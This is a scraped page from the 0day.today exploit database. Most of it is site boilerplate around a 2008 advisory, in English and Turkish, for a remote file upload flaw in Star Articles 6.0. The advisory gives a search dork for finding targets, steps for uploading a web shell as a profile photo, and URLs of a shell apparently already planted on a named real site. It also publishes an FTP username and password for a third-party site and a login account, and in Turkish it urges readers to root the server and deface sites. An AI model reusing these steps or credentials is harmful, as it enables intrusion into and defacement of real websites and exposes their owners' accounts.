0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Star Articles 6.0 Remote File Upload Vulnerability

Author

ZoRLu

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-4276

Category

web applications

Date add

27-11-2008

Platform

unsorted

==================================================
Star Articles 6.0 Remote File Upload Vulnerability
==================================================


[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php"   ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------

expl:

http://script//authorphoto/user_name[id].php

example:

http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )

hemen hacklemeyin arkadaslar servery kurcalayIn bakIn misal:

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bir cok site var. ya rootlayyn yada tek tek cakyn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bu serverdaki bir site icin:

ftp://ftp.ababy.com.au/  ( ftp pass ve username )

user: kiddybab

pass: KidEw1nk08

ne biliyim iste biseler yapmaya calIsIn amacIm yardImcy olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)


first register for site

after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )

click to gozat button and select your shell after upload you shell

more after go repat edit profile page and you look you photo. right click to you photo

select to properties copy photo link and paste you explorer.

go your shell

examp:

user: trt-turk@hotmail.com

passwd: zorlu1

login: 

http://www.lcfarticles.com/user.login.php

shell:

http://www.lcfarticles.com//authorphoto/zorlu40.php


[~]----------------------------------------------------------------------



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Star Articles 6.0 Remote File Upload Vulnerability

Report Error

Report Error